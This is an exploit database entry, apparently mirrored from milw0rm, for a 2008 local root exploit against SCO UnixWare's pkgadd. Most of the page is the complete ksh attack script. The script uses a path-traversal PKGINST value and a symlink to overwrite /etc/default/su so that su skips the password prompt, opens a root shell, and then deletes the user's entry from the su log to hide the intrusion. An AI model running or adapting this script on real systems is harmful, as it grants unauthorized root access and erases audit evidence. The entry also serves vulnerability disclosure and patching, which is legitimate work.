header-logo
Suggest Exploit
vendor:
UnixWare
by:
qaaz
7.2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: UnixWare
Affected Version From: SCO UnixWare < 7.1.4 p534589
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: UnixWare
2008

UnixWare pkgadd Local Root Exploit

This exploit is for SCO UnixWare < 7.1.4 p534589. It uses the pkgadd command to create a symbolic link to /etc/default/su, which is then used to gain root privileges.

Mitigation:

Upgrade to the latest version of SCO UnixWare
Source

Exploit-DB raw data:

#!/bin/ksh
#
# 04/2008: public release
# SCO UnixWare < 7.1.4 p534589
#
if [ `id -un` = 'root' ]; then
	grep -v " $1-root\$" /var/adm/sulog >su.log
	cp su.def /etc/default/su
	cp su.log /var/adm/sulog
	rm -f su.def su.log woot.log
else
	echo "------------------------------------"
	echo " UnixWare pkgadd Local Root Exploit"
	echo " By qaaz"
	echo "------------------------------------"
	EVIL=`echo 'XX\nPROMPT=No\nXX'`
	cp /etc/default/su su.def
	ln -s /etc/default/su woot.log
	PKGINST=../../../..`pwd`/woot /usr/sbin/pkgadd "$EVIL" 1>/dev/null 2>&1
	su root -c "$0 `id -un`; /bin/sh -i"
fi

# milw0rm.com [2008-04-04]

Navigation

Suggest Exploit

Services By CQR